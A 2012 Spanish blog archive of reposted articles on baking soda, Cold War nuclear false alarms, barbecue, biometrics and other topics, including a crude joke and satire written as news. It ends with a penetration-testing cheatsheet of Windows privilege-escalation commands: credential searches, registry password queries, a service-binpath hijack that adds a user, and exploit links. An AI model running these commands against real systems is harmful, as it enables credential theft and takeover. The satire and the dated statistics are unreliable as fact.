2. Refresque su boca

Ponga una cucharadita en medio vaso de agua, hacer gárgaras, escupir y enjuagar. Los olores se neutralizan.

3. Remoje aparatos bucales

Remoje los aparatos bucales, como retenedores, boquillas y dentaduras postizas, en una solución de 2 cucharaditas de bicarbonato de sodio disuelto en un vaso o recipiente pequeño de agua tibia. El bicarbonato de sodio afloja las partículas de alimentos y neutraliza los olores para mantener frescos los aparatos.

4. Utilizar como un exfoliante facial y corporal.

Dése un exfoliante vigorizante facial y corporal. Haga una pasta de bicarbonato de sodio 3 partes a 1 parte de agua. Frote con un movimiento circular suave para exfoliar la piel. Enjuague. Esto es lo suficientemente suave para uso diario.

5. Antiácido

El bicarbonato de sodio es un antiácido seguro y eficaz para aliviar el ardor de estómago, acidez estomacal y / o indigestión ácida. Se recomienda consultar con un especialsita asntes de usarlo personas con problemas de hipertensión arterial.

6. Tratar picaduras de insectos y picazón en la piel

Para las picaduras de insectos, hacer una pasta de bicarbonato de sodio y agua y aplique como un bálsamo sobre la piel afectada. Para aliviar la picazón, sacudir un poco de bicarbonato de sodio en la mano y lo frota en la piel húmeda después del baño o la ducha.

7. Tratamiento para el cabello

El vinagre es asombroso para el pelo, pero el bicarbonato de sodio tiene su lugar en la ducha también. Rocíe una pequeña cantidad de bicarbonato de sodio en la palma junto con tu champú favorito. Use champú como de costumbre y enjuague a fondo con bicarbonato de sodio, ayuda a eliminar los residuos de productos para que su pelo esté más limpio y más manejable.

8. Hacer un baño de inmersión

Agregar 1/2 taza de bicarbonato de sodio a su baño para neutralizar los ácidos en la piel y ayudar a eliminar el aceite y el sudor, también esto hace que su piel se sienta muy suave.

9. Calme sus pies

Disuelva 3 cucharadas de bicarbonato de sodio en una tina con agua tibia y remojar los pies. Frote suavemente.

Limpieza

10. Platos, Ollas y Sartenes

Añadir 2 cucharadas colmadas de bicarbonato de sodio (junto con tu detergente regular) para ayudar a cortar la grasa y los alimentos en los platos, ollas y sartenes. Dejar en remojo con bicarbonato de sodio los utensilios con restos de alimentos endurecidos.

11. Limpie el microondas

El bicarbonato de sodio en una esponja húmeda limpia suavemente dentro y fuera del microondas y nunca deja un olor químico agresivo. Enjuague bien con agua.

12. Cafetera Limpia y Teteras

Eliminar manchas de café y té y eliminar malos sabores amargos lavando las tazas y cafeteras en una solución de bicarbonato 1/4 taza de sodio en 1 cuarto de galón de agua tibia. Para las manchas difíciles, intenta empapar durante la noche en la solución de bicarbonato de sodio y detergente o lavado con bicarbonato de sodio con una esponja limpia y húmeda.

13. Limpie el horno

Espolvorear bicarbonato de sodio sobre la parte inferior del horno. Rocíe con agua para humedecer el polvo. Deje reposar durante la noche. Por la mañana, fregar con una esponja y enjuague.

14. Pisos limpios

Elimine la suciedad y la mugre (sin marcas de arañazos no deseados) los tableros y tejas con 1/2 taza de bicarbonato de sodio en un cubo de agua templada y enjuagar para un piso brillante. También ayuda para marcas de desgaste.

15. Muebles.

Usted puede hacer un pulimento con limón para muebles caseros , o se puede limpiar y eliminar las marcas de lápiz de color (incluso) de las paredes y los muebles pintados mediante la aplicación de bicarbonato de sodio en una esponja húmeda y frotando ligeramente. Limpie con un paño limpio y seco.

16. Limpie las cortinas de ducha.

Limpiar y desodorizar su cortina de ducha de vinilo rociando bicarbonato de sodio directamente sobre una esponja húmeda limpia o un cepillo. Frote la cortina de la ducha y enjuague. Colgar para que se seque.

17. Aumente su detergente líquido

Dar a tu ropa un impulso al añadir media taza de bicarbonato de sodio. Un mayor equilibrio de pH en el lavado pone ropa limpia, fresca y luminosa.

18. Quite las manchas de aceite y grasa

Utilice bicarbonato de sodio para limpiar manchas de petróleo y los derrames de grasa en su piso. Espolvoree bicarbonato de sodio en el lugar y frote con un cepillo mojado.

19. Limpie las baterías

El bicarbonato de sodio se puede utilizar para neutralizar la corrosión ácida de la batería de los automóviles, cortadoras, etc porque es un alcalino suave. Asegúrese de desconectar los terminales de la batería antes de limpiar. Haga una pasta de bicarbonato de sodio 3 partes a 1 parte de agua, aplicar con un paño húmedo para limpiar la corrosión de los terminales de la batería. Límpielos con vaselina para evitar la corrosión. Por favor tenga cuidado al trabajar cerca de una batería contienen un ácido fuerte.

20. Vehículos limpios

Use bicarbonato de sodio para limpiar las luces del coche, cromo, ventanas, llantas, asientos de vinilo y alfombras de piso sin tener que preocuparse por las marcas de arañazos no deseadas. Use una solución de bicarbonato de sodio de 1/4 taza de bicarbonato de sodio en 1 cuarto de galón de agua tibia.

Desodorización

21. Desodorizar botes de basura

Espolvoree bicarbonato de sodio en el fondo de su bote de basura para mantener la basura sin contaminar la casa de olor.

22. Desodorizar drenajes

Para desodorizar el lavabo y la bañera vierta 1/2 taza de bicarbonato de sodio por el desagüe mientras mantiene abierta la llave de agua caliente, esto neutralizará los olores ácidos y hará la limieza básica y sostenida para un drenaje libre.

23. Quitar el olor de las alfombras

Abundantemente espolvorear bicarbonato de sodio en la alfombra. Deje reposar durante la noche, o tiempo que sea posible (cuanto más tiempo se pone mejor funciona). Barrer las grandes cantidades de bicarbonato de sodio y aspirar el resto.

Misceláneo

24. Extinguir Incendios

El bicarbonato de sodio puede ayudar en pequeños incendios eléctricos de cocina, porque cuando el bicarbonato de sodio se calienta, emite dióxido de carbono, lo que ayuda a apagar las llamas. Para pequeños incendios en la cocina (sartenes, parrillas, hornos, parrillas), apague el gas o la electricidad si es seguro hacerlo. Un paso atrás y eche un puñado de bicarbonato de sodio en la base de la llama para ayudar a apagar el fuego.

25. Limpieza de Frutas y Hortalizas

El bicarbonato de sodio es la manera más segura de limpiar alimentos. Apenas asperjar un poco en una esponja limpia y húmeda, frote y enjuague.

Fuente: Wakeup-world.com
Adaptación, traducción e investigación: Vida Lúcida
Tomado de: http://www.unavidalucida.com.ar/2012/08/25-usos-sorprendentes-del-bicarbonato.html

17 octubre 2012

5 veces en las que el mundo ha pendido de un hilo

Quizás los más jóvenes lectores del blog, incluido yo, nacieran en una época en la que no se mascaba la tensión de la guerra en el aire. Pero los más veteranos probablemente nacieron durante la Guerra Fría, una época muy importante del siglo XX que dividió el mundo entre los países de Occidente y la amenaza de la URSS en Rusia y Europa del Este, incluyendo a los simpatizantes de éstos como la isla de Cuba. En el mundo, estadistas de países “neutrales” caían y surgían por los designios de estas dos superpotencias.
Prueba nuclear en el Atolón Bikini (La casa de Bob Esponja :3)
Por aquel entonces, ambos bandos se armaron de incontables armas nucleares, para cumplir la regla de la destrucción mutua asegurada (DMA o MAD en inglés), que supuestamente disuadiría al otro bando de disparar al saber que él igualmente acabaría destruido. Sin embargo, también se desarrolló un complejo sistema de detección de misiles nucleares, para poder detectar los misiles del odiado enemigo. Pero en varias ocasiones hubo fallos fatales en los sistemas informáticos infalibles que aunque por suerte no abocaron en una III Guerra Mundial, casi lo consiguen, destruyendo a la humanidad por el camino. He aquí unos ejemplos en los que el destino la humanidad ha estado literalmente sobre un botón rojo:
  • Crisis de los misiles: Cuba, 1962: Tras la fallida invasión de Cuba por parte de Estados Unidos en la Bahía de Cochinos (en el país caribeño) el aliado incondicional de la URSS tuvo roces con Estados Unidos. La crisis comenzó cuando aviones espías estadounidenses U-2 tomaron fotografías de lo que parecían ser bases de misiles. El presidente, John F. Kennedy, estableció un bloqueo a la isla, cosa no vista obviamente con buenos ojos desde Moscú. Días después, antiaéreos cubanos derriban otro avión espía U-2 estadounidense, aumentando considerablemente la tensión. Sin embargo, ya se habían puesto en marcha negociaciones secretas entre EE.UU y la URSS para evitar el conflicto, negociaciones en las que el gobierno cubano e incluso Castro estuvieron excluidos. Finalmente Estados Unidos aceptó un acuerdo en el que su gobierno se abstenía de invadir o apoyar cualquier acto bélico contra Cuba a cambio de que fuesen desmanteladas las instalaciones de misiles. Este acuerdo no fue desvelado al público hasta 6 meses después.
  • El incidente de la cinta equivocada: Estados Unidos, 1979: El centro de NORAD y el Pentágono se levantan con una alerta de ataque soviético MAO-3. Todos los sistemas se pusieron en alerta, los bombarderos despegaron y se activó la defensa civil. 300 misiles soviéticos fueron lanzados. Sin embargo,  los datos de los satélites y los de radar en línea directa no coincidían con los del ordenador, que visualizaba los 300 misiles soviéticos. Prudentemente, EE.UU no hizo represalia alguna, y al cabo del tiempo los ordenadores empezaron a notificar incluso impactos en suelo norteamericano, y ya era obvio que se trataba de algún tipo de error informático. Horas después se comprobó que alguien había introducido una cinta de entrenamiento en la base de datos de la red de análisis de amenazas.
  • El incidente del chip defectuoso: Estados Unidos, 1980: Este incidente fue tomado bastante a la ligera debido a que el ataque detectado fue ilógico, ya que los ordenadores detectaron 200 misiles soviéticos, luego ninguno, y de nuevo 200. Al fijarse en la información de los satélites y comprobar que no había ninguna amenaza, se determinó que la falsa alarma provenía de un chip defectuoso.
  • El incidente del equinoccio de otoño: Unión de Repúblicas Socialistas Soviéticas, 1983: Primero hay que explicar que el sistema ruso de alerta temprana soviético OKO funciona con sus satélites enfocando a la línea del horizonte, detectando a los misiles cuando ascienden sobre la misma, haciendo el sistema más eficaz, económico y más difícil de inutilizar que el estadounidense. Un día, el sistema detectó el lanzamiento de numerosos ICBMs, e identificó cinco trazas térmicas como misiles Minuteman sin duda alguna. Sin embargo, pese a las evidencias, el teniente coronel Stanislav Petrov, del GRU (Inteligencia militar soviética), al mando del centro de defensa aeroespacial rusa, mantuvo la sangre fría y no ordenó activar la alerta. Preguntado años después porqué no lo hizo, respondió: “La gente no empieza una guerra nuclear con sólo cinco misiles”. Resulta que aquel día se había producido una rara conjunción entre la red de satélites OKO, la Tierra y el Sol, coincidiendo con el equinoccio de otoño: el Sol se elevó sobre el horizonte en un ángulo tal que coincidía con el área tangencial de cobertura de todos los satélites que vigilaban los emplazamientos norteamericanos de misiles, y esto produjo en sus sensores señales térmicas espurias
  • El incidente del cohete noruego: Noruega, 1995: Aquel día el país lanzó con colaboración de Estados Unidos un misil sub-orbital para el estudio de auroras boreales y otros fenómenos electromagnéticos llamado Black Brant XII. Noruega tiene un pequeño programa espacial científico, pero el lanzamiento de aquel cohete en tamaño no tenía nada que ver con sus anteriores lanzamientos, y el tamaño del cohete era muy parecido al de un ICBM, por lo que su reflexión y marca térmica eran parecidos. La versión de Noruega sostiene que avisaron con antelación a Rusia, pero que debido al caos del gobierno de Boris Yeltsin no llegó a su destinatario. Los satélites OKO, y muchos sistemas de radar convencional detectaron el cohete, y las armas nucleares se pusieron en pre-alerta, mientras se reasignaban los objetivos para aniquilar Noruega. No obstante, al ver la trayectoria del cohete y que no se producían más lanzamiento, se suspendió el proceso de represalia. Sin embargo, hasta que el suceso no fue esclarecido (unas 48 horas después), la fuerza nuclear permaneció en pre-alerta.
Estos casos demuestran cuantas veces el destino de la Tierra ha dependido de la decisión de un solo hombre, y de cómo nada es infalible en este mundo. Espero que este artículo os conciencie del peligro que supone el armamento nuclear, y espero, como espero que esperéis vosotros, que algún día ese armamento desaparezca de la Tierra.

Tomado de: http://neofosis.com/2011/01/5-veces-en-las-que-el-mundo-ha-pendido-de-un-hilo/

15 octubre 2012

Inventan perfume que hace que la transpiración huela bien

Científicos diseñaron una píldora que convierte la transpiración en un líquido perfumado.
Una artista australiana y un biólogo crearon una pastilla que una vez tragada hace que la transpiración emane perfumada del cuerpo humano. Así es, querido lector amigo de Noticias Locas. No más olores feos luego de jugar al fútbol o al salir del gimnasio sin bañarse.

Esta revolucionaria píldora simplemente transforma la transpiración en una fragancia que lleva las características únicas de la persona que la toma. "Somos genéticamente únicos", declaran los inventores en su sitio web. "La pastilla se digiere, penetra en el cuerpo y la piel hace el trabajo de un atomizador", explica la pareja de creadores.

Aunque la pastilla está en su etapa final de desarrollo y todavía no tiene fecha de salida al mercado, ya hay interesados en comercializarla y garantizan que será un éxito. Y de seguro lo será para aquellos que no les guste bañarse luego de hacer ejercicio. Pero principalmente para sus parejas, que no tendrán que soportar más el terrible olor a transpiración.

Tomado de: http://www.noticiaslocas.com/EFkppZppAy.shtml

14 octubre 2012

Para San Justo

Despues de quedarse sin dinero, un hombre se encuentra afuera del casino Tigre y a las cuatro de la mañana para un taxi:
-Buenas, mire, tengo un problema: necesito que me lleve a San Justo, no tengo dinero para pagarle, por lo que pense que usted me deja en la puerta de mi casa, vivo en un primer piso, subo y le bajo el dinero-
-No, esa mierda no me la creo- responde el taxista
-Vamos, necesito que me lleve, no tengo nada de plata-
-Que no, no te llevo, andate caminando-
Finalmente el tipo llego a San Justo como pudo. Al cabo de un mes vuelve a ir al mismo casino y le va de maravilla. Gana 10.000 pesos. Sale del casino otra vez a las cuatro de la madrugada para tomar un taxi y ve que hay una cola de 20 taxis y se da cuenta que el ultimo de todos era el del otro dia, y se dijo para si mismo:
-A este hijo de puta lo voy a cagar-
Va con el primer taxista:
-Hola, buenas noches. Le doy 1.000 pesos si me lleva a San Justo, pero con una condicion-
-Si, si, la que sea, la que sea- Acepta el conductor
-Que cuando lleguemos alla me la chupes y te dejes romper el orto-
-Anda a cagar boludo, decile a otro-
El segundo taxista:
-Hola, ¿Que tal?, le doy 1.000 pesos si me lleva a San Justo con una condicion-
-Si hombre, lo que sea, ¿que tengo que hacer?
-Que cuando lleguemos alla me la chupes y te dejes romper el orto-
-Anda a la mierda boludo-
Asi toda la cola y cuando llega al ultimo, que era el del otro dia, le dice:
-Mira, te doy 1.000 pesos si me lleva a San Justo, pero con una condicion-
-Si, claro, la que sea-
-Que cuando pases por delante de todos estos taxis saque la mano y grites: ¡Voy para San Justo, voy para San Justo!

13 octubre 2012

Facebook avisará de las amistades que no te convienen

La popular red social, que esta semana se ha convertido en la web más visitada de Internet, acaba de implementar un módulo que detectará aquellos contactos perjudiciales para el usuario y avisará a éste para que deje de ser su amigo si así lo desea. “Nadie conoce a nuestros usuarios mejor que nosotros, así que detectamos aquellos amigos que pueden hacerte daño mejor que tú mismo. Hacemos lo posible para que te des cuenta de que aquella amiga sólo te llama para que la ayudes a ir de compras y retratamos al típico jeta que lo único que quiere es que le presentes a tu hermana” explica Mark Zuckerberg, fundador de Facebook.
El filtro que ha instalado Facebook -y que ha supuesto una inversión de millones de dólares para programar “detectores de personalidad y malos rollos”- estará disponible a partir de mayo, aunque ya se está probando en algunos usuarios. Éstos han empezado a recibir comentarios y valoraciones cuando han querido agregar a un nuevo amigo o cuando han visitado el perfil de alguno que ya tenían. Se trata de mensajes como “Cuidado con esa chica, no es trigo limpio”, “¿Por qué no te buscas a alguien de tu edad?” o bien “Este es de los que sólo llaman cuando tienen problemas pero si es al revés todo son excusas, y si no al tiempo”.
Son muchos quienes afirman sentirse más seguros ahora que saben que una aplicación informática tutela sus relaciones. “Yo soy de personalidad débil y nunca sé decir que no, así que la web vigila que no me haga amiga de nadie que me mangonee o me diga lo que tengo que hacer. Ya he roto con casi 10 amigas mías porque Facebook me lo ha dicho”, explica una joven. “Por ejemplo, siempre había sospechado de mi hermana y ahora he confirmado mis temores. Se ha hecho de esto del Facebook y cuando me la he ido a agregar como amiga me ha salido un mensaje que decía ‘Cuidado con la lagarta de tu hermana’, así que ya no le hablo”.
Aunque este nuevo módulo no se ideó inicialmente para proteger a los niños, lo cierto es que aporta tranquilidad a muchos padres, que saben que sus retoños son proclives a hacerse amigos de los más “chulitos” de la clase. “Yo no sabía que mi hijo tenía amistad con gente maliciosa e indeseable, pero sí notaba que cada vez se comportaba peor. Me metí en Facebook y vi que se había hecho amigo de lo peorcito del colegio”, explica una madre. “A partir de ahora estaré más tranquila. Y, francamente, no sólo por mis hijos, sino por mí misma. Esta tarde intentaré agregarme a Zapatero, a ver si es de fiar”. 

Tomado de: http://www.elmundotoday.com/2010/04/facebook-avisara-de-las-amistades-que-no-te-convienen/

12 octubre 2012

El Papiro de Rhind, matemática antigua

Con frecuencia asumimos que los conceptos matemáticos que utilizamos a diario tienen un origen reciente. Pero la realidad es muy diferente. Un documento conocido como “el Papiro de Rhind” o “el Papiro de Ahmes”, de unos 3800 años de antigüedad, contiene una recopilación de unas 87 cuestiones matemáticas muchas de las cuales son lo suficientemente complejas como para muchos estudiantes sean incapaces de resolverlas. El papiro, que mide unos seis metros de longitud y 33 cm de ancho, se encuentra en muy buen estado de conservación y es considerado un verdadero tesoro.
El Papiro de Rhind, muchas veces referido como “Papiro de Ahmes” es un documento antiguo, escrito sobre un material “de moda” en la antigüedad elaborado a partir de la pulpa obtenida de una planta acuática muy común en el río Nilo, en Egipto, conocido como papiro. Mide unos seis metros de largo y tiene casi 33 centímetros de ancho, y contiene una suerte de resumen del conocimiento matemático de la antigüedad. Los peritos estiman que el papiro fue escrito aproximadamente unos 1650 años antes de nuestra era, por un escriba llamado Ahmes. Pero los conceptos matemáticos que contiene son aún más antiguos, ya que como el propio escriba explica en el documento el papiro es básicamente una recopilación de textos anteriores, cuyo origen se remonta hasta unos 2000 años antes de nuestra era. No es posible determina a ciencia cierta la edad de cada uno de los 87 conceptos explicados en el documento, pero todos son de interés para los matemáticos, ya que incluye cuestiones aritméticas básicas, fracciones, cálculo de áreas, volúmenes, progresiones, repartos proporcionales, reglas de tres, ecuaciones lineales y trigonometría básica.
El papiro mide unos seis metros de longitud y 33 cm de ancho. El papiro mide unos seis metros de longitud y 33 cm de ancho.
La historia reciente del documento se remonta a mediados del siglo  XIX. En 1858 un egiptólogo escocés llamado A. Henry Rhind visitó Egipto para tratar su tuberculosis y casi sin proponérselo encontró en un mercado de Luxor el papiro que actualmente se conoce como papiro Rhind o de Ahmes. Según pudo averiguar, el documento había sido hallado en las ruinas de un antiguo edificio de Tebas. Cuando Rhind falleció cinco años más tarde (a los 30 años de edad), el papiro quedó alojado en el Museo Británico, aunque algunas de sus partes se habían perdido. Cincuenta años después algunos de los fragmentos extraviados se hallaron en los almacenes que posee la Sociedad histórica de Nueva York y fueron trasladados al Museo Británico de Londres. En la actualidad, el documento se compone de 14 láminas, con un tamaño promedio de 40 x 32 centímetros, agrupados en tres partes. Los papiros EA 10057 y EA 10058 se encuentran en el Museo Británico (aunque no están exhibidos al público) y papiro 37.1784E se encuentra en el Museo de Brooklyn.
Los peritos estiman que el papiro fue escrito aproximadamente hace 3800 años. Los peritos estiman que el papiro fue escrito aproximadamente hace 3800 años.
La primera frase del papiro es prometedora: “Cálculo exacto para entrar en conocimiento de todas las cosas existentes y de todos los oscuros secretos y misterios". Y su contenido le hace justicia. A lo largo de esos seis metros de histórico documento se encuentran desgranados conceptos claves para la matemática y la geometría, así como una explicación del sistema egipcio para el tratamiento de las fracciones. Es sabido que los egipcios antiguos operaban con fracciones de una manera ligeramente distinta a la actual, utilizando sólo fracciones unitarias (de la forma 1/n) y formando los numero fraccionarios más complejos a partir de sumas. Ese sistema se explica en el documento, junto a métodos para la resolución de ecuaciones de primer grado, progresiones aritméticas, cálculo de áreas de figuras planas, proporciones, progresiones geométricas y muchos más, entre los que llama la atención una sección dedicada a problemas relativos a la alimentación de ganado y pollos bajo diferentes condiciones. Como puedes ver, esos cálculos que tanto trabajo te dan en el colegio ya habían sido analizados y resueltos hace más de 3800 años.
Referencia: http://es.wikipedia.org/wiki/Papiro_Rhind
Tomado de: http://www.neoteo.com/el-papiro-de-rhind-matematica-antigua

11 octubre 2012

CONOCÉ LOS 10 DATOS MÁS CURIOSOS DE LAS REDES SOCIALES

Las redes sociales ya son parte de la vida cotidiana de millones de personas. Mirá hasta qué punto se ha llegado con estos 10 datos curiosos:
  1. Facebook supera a Google en el número de visitas semanales.
  2. Si Facebook fuese un país, sería el tercer país más grande del mundo.
  3. Cada segundo una persona nueva se registra en LinkedIn.
  4. El 20% de las búsquedas realizadas en Google cada día no se habían realizado nunca antes.
  5. La edad promedio de un empleado de Facebook es 31 años.
  6. Youtube es el segundo buscador más grande del mundo.
  7. Si se hiciese un libro con los contenidos de la Wikipedia, tendría 2,25 millones de páginas.
  8. Australia es el país en el que más se dedica tiempo a Facebook al mes, con más de 7 horas de promedio.
  9. Una citación judicial por Facebook en Australia es legal.
  10. 200 millones de usuarios en Facebook acceden a la plataforma desde sus teléfonos móviles.
Tomado de: http://elsensacional.infonews.com/nota/10546-conoce-los-10-datos-mas-curiosos-de-las-redes-sociales/

10 octubre 2012

Lo que no debés hacer en un asado

La lista de tips que desmitifican todo lo referido a una buena parrillada. Enterate

Cuando preparamos un asado, siempre, pero siempre, hay alguien al lado de la parrilla (un cuñado, un amigo, el suegro) que nos remarca todo lo que estamos haciendo mal (andá dando vuelta ese choricito, subí un poco la parrilla, etc.).

Planeta Joy decidió ponerse en el lugar de ese personaje insoportable y listaron las diez cosas que un asador jamás debe hacer a la hora de prender el fuego, cocinar la carne y servirla. Estos son los 10 pecados capitales del parrillero.

1. Usar alcohol para prender el fuego

Los asadores consagrados consideran esto una verdadera mariconeada. Utilizar alcohol para invocar a la diosa de las llamas no sólo acelera el proceso de incineración del fuego y nos priva de una gloriosa "previa" -con vino y quesito mientras el asunto se pone en marcha-, sino que también resulta muy peligroso.

2. Echar al fuego cualquier leña

El fuego no es el hipopótamo de Pumper Nic, al que se le puede echar cualquier cosa. Hay que cuidarlo, avivarlo, verlo crecer como a un niño sin que se convierta en un monstruo. En este sentido, es muy común que el fuego se apague porque la leña no es buena o porque uno tira pedazos demasiado grandes. Aquí, tres datos a tener en cuenta: primero, que la leña que se va a utilizar debe estar siempre estacionada, sin humedad; segundo, que las dos mejores variedades para hacer un asado son la de espinillo y la ñandubay (no el quebracho); tercero, que hay que tener paciencia porque un leño grande tarda una hora y media hasta que está listo para calentar nuestro asado.

3. Tapar la carne con papel de diario

Uno de los grandes temores de cualquier asador es que la brasa no alcance para cocinar la carne. Por eso utilizan toda clase de artilugios para lograr el ansiado "efecto hornito". Uno de ellos es tapar la carne con papel de diario. Sin embargo, los expertos consultados afirman que esto no es recomendable desde el punto de vista sanitario.

4. Cortar la carne para ver si está jugosa

Cortar la carne para "ver si está jugosa" debería ser caratulado por la Justicia de los asadores como un crimen de lesa humanidad. Ese tajo (por más leve que sea) provoca un drenaje de los jugos más sabrosos y hace que termine seca como suela de zapato. Este error se aprecia especialmente en lomos y bifes de chorizo, que pierden toda gracia cuando no están jugosos.

5. Poner la carne congelada en la parrilla

Sucede con frecuencia. Uno hizo las compras la noche anterior y decide que la carne se quedará en el freezer hasta el día siguiente, "para que se conserve mejor"; y luego, directo a la parrilla. Error grave. El que haga esto comerá un asado duro. Antes de echar la carne a la parrilla hay que estabilizar temperaturas: sacarla del congelador, que pase al frío de la heladera y recién ahí llevarla a la parrilla.

6. Bajar demasiado la parrilla

Como dijimos, el asador amateur convive a diario con el miedo a que se le apague el fuego y que la brasa no alcance para cocinar la carne. Por eso baja la parrilla hasta que los fierros casi tocan el carbón. El resultado es, indefectiblemente, que la carne quede arrebatada. Esto es: carne cocida por fuera -inclusive calcinada- y roja por dentro.

7. Poner la tira de asado así nomás

La tira de asado es el corazón de toda buena parrillada y prepararla es tan simple que resulta increíble que, al momento de echarla a las brasas, muchos cometan el error de colocarla de costado o, peor aún, con el lado del hueso hacia arriba. La tira siempre se coloca con los huesos hacia abajo y puede permanecer así durante horas. Recién poco antes de servirla se la rota para que se terminen de cocinar los otros costados.

8. Servir la carne en bandejas metálicas

El asado puede quedar perfecto, pero si se come frío, todo el esfuerzo habrá sido en vano. Eso le pasa a los amateurs que llevan la carne a la mesa en bandejas metálicas que bajan la temperatura de la carne. Lo correcto es utilizar tablas de madera, aunque lo ideal es usar braseros que aseguran que los cortes lleguen a la mesa calentitos, como debe ser.

9. Apurar mollejas y chinchulines

Uno de los errores más comunes es apurar mollejas y chinchulines colocando bajo ellas gran cantidad de brasas, lo cual genera una detestable "gomosidad" de la achura en cuestión. Una buena alternativa en el caso de las mollejas es calentarlas y, una vez que están lo suficientemente sólidas para cortar, echarlas como lonjas para que queden bien crocantitas.

10. Ser ansioso

Dejamos este último punto para el final porque sin dudas es el más importante. Todo lo que apunte a acelerar el proceso del asado terminará saliendo mal: poner pastillas para prender el fuego, usar briquetas, reavivar las brasas con secadores de pelo o darle a la carne más vueltas que una calesita. El asado es el elogio de la lentitud y el disfrute sagrado se encuentra en dedicar al proceso el tiempo que merece.

Fuente: Planeta Joy

08 octubre 2012

Vasos sanguíneos, nueva clave de seguridad

La empresa japonesa Fujitsu apuesta al mercado de América Latina con el sistema Palm Secure, que permite identificar el mapa único de las venas y arterias en la palma de la mano



El creciente robo de contraseñas y otros ataques de vulneración de sistemas de seguridad cometidos por los cibercriminales impulsa la búsqueda de nuevas formas de proteger a los usuarios y a las empresas.

Por eso, mientras que Intel prepara un software para tabletas y teléfonos inteligentes que consiste en el bloqueo mediante movimientos de manos, la compañía japonesa Fujitsu ofrece un sistema de autentificación biométrica basado en los vasos sanguíneos de las palmas, Palm Secure.

“Consiste en una luz infrarroja que identifica y captura el mapa de venas y arterias de la palma de la mano. La información obtenida se compara con el registro original que se tiene guardado del usuario”, explicó el country manager para América Latina, Juan Ignacio Accogli, a Infobae.

El producto sirve para controlar el acceso de personal, validar transacciones bancarias y hasta para identificar a los pacientes en los hospitales. Para poder realizar la validación, la mano debe contar con irrigación sanguínea al momento de la identificación. Ese es el principal requisito.




A la izquierda, una muestra del sistema Palm Secure. Derecha, el argentino Juan Ignacio Accogli, representante de Fujitsu para la región

“La ventaja es que la estructura de los vasos sanguíneos de la mano no cambia a lo largo de toda la vida y es independiente de condiciones externas y circunstanciales de la persona. Incluso con la mano herida, salvo que sea grave, la validación se realiza sin problemas”, añade Accogli.

Según advierte, además, otras tecnologías biométricas, en especial las de huellas dactilares, presentan un menor nivel de seguridad porque “al ser de menor costo, se han instalado para diversas aplicaciones, incluso accesos a gimnasios o clubes”.

Palm Secure es uno de los productos insignia de Fujitsu, que opera en Brasil desde 1972 y que, tras desembarcar en Argentina, planea expandirse en el mercado latinoamericano. En abril, abrió su primera oficina en Santiago de Chile y a fines de octubre llegará a Bogotá, capital de Colombia.
Tomado de: america.infobae.com/notas/58159-Vasos-sanguineos-nueva-clave-de-seguridad

07 octubre 2012

Cheatsheet para el escalado de privilegios en Windows

En un test de intrusión de una máquina Windows muchas veces conseguimos una consola con un usuario sin privilegios, sobretodo en entornos Citrix o similares. La siguiente tarea en este caso suele ser conseguir acceso como system o con otra cuenta con privilegios de administración o, al menos, más elevados.

Existen multitud de técnicas más o menos efectivas dependiendo los "descuidos" de los administradores, los fallos de configuración, las vulnerabilidades y de lo actualizado que esté el software de la máquina objetivo. Os recomiendo concretamente leeros este artículo de Scott Sutherland y sobretodo esta presentación de insomniasec.com, de la que nuestro amigo Tim Arneaud ha tomado muchas cosas para elaborar un cheatsheet bastante esquemático que a la postre es muy útil y que también queríamos tener a mano.

Esta lista la iremos ampliando según vayamos encontrado nuevas técnicas y funcionalidades. Como siempre, cualquier comentario, sugerencia o feedback son bienvenidos.

Credenciales almacenadas

Buscar credenciales dentro de:

c:\unattend.xml
Estas credenciales están almacenadas en base64 y pueden decodificarse fácilmente:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

Módulos de Metasploit Framework:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb

c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini

Programas de recuperación de contraseñas - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html

Obtener credenciales en texto plano con mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

Búsquedas en el registro de Windows

VNC:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Parámetros SNMP:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"

Búsquedas en el registro - portapapeles (opcional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]

Aplicaciones GUI inseguras

Ejecutándose como SYSTEM que puedan abrir cmd.exe o directorios "ficheros, logs" etc.

Permisos de directorios
cacls
icacls

Herramientas de Sysinternals

Comprobar procesos y aplicaciones que se ejecutan en el inicio con Autoruns y procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027

Servicios apuntando a localizaciones escribibles
*- instalaciones huérfanas - aplicaciones que ya no están instaladas pero que permanecen en el inicio
*- reemplazo de dlls desconocidas
*- Rutas de directorios con permisos inadecuados - ¿posible sobreescritura?

sysinternals tools
accesschk.exe -uwcqv *

*- procesos inseguros
*- robo de tokens de procesos/threads (incognito)
*- hijack handles for write access

Cambio del binario de servicio upnp
http://lanmaster53.com

sc qc upnphost sc config upnphost binpath= "net user /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost

Esto puede funciona con otros servicios si los permisos lo permiten

Programas para comprobar vectores de escalado de privilegios en Windows:
1. Windows-privesc-check ( V1 , V2 )

2. AccessChk

3. AccessEnum

4. Windows Permission Identifier

5. Dark Elevator - hxxp://web.archive.org/web/20100817073927/http://root.net.nz/darkelevator.html

Vulnerabilidades de escalado de privilegios

Windows kernel privilege escalation
KiTrap0D
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

Tomcat Windows privilege escalation
http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
